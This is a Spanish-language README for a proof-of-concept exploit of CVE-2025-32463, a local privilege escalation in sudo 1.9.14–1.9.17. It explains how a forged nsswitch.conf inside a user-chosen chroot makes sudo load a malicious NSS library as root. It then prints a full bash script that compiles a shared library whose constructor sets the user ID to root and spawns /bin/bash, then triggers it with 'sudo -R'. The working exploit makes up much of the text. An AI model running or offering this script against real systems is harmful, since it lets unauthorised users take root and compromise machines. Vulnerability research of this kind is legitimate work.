
Exploit de prueba de concepto para CVE-2025-32463, una escalada de privilegios local en sudo 1.9.14-1.9.17 mediante configuración incorrecta de chroot e inyección de biblioteca NSS maliciosa.
--chrootID de ExploitDB: 52352
Este repositorio documenta una vulnerabilidad crítica de escalada de privilegios local (LPE) que afecta a las versiones Sudo 1.9.14 – 1.9.17.
La vulnerabilidad se debe a una implementación incorrecta de la opción sudo -R (--chroot) y permite al atacante ejecutar comandos con privilegios de root, aunque no esté autorizado en el archivo sudoers.
🔥 Resultado: Usuario no autorizado → shell root
El parámetro --chroot (-R) de Sudo permite al usuario ejecutar comandos dentro de un directorio raíz definido por él mismo.
Sin embargo, como resultado de un cambio introducido en sudo 1.9.14:
sudoers se valide por completochroot() se realiza sobre el directorio especificado por el usuarioEsta situación permite que, a través de un archivo falso creado por el atacante:
/etc/nsswitch.conf
se cargue una biblioteca NSS maliciosa (libnss_*.so) con privilegios de root.
nsswitch.conf falsosudo -R <dir> <command>⚠️ Utilícelo únicamente en entornos educativos y de pruebas
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash","/bin/bash",NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
sudo -R woot woot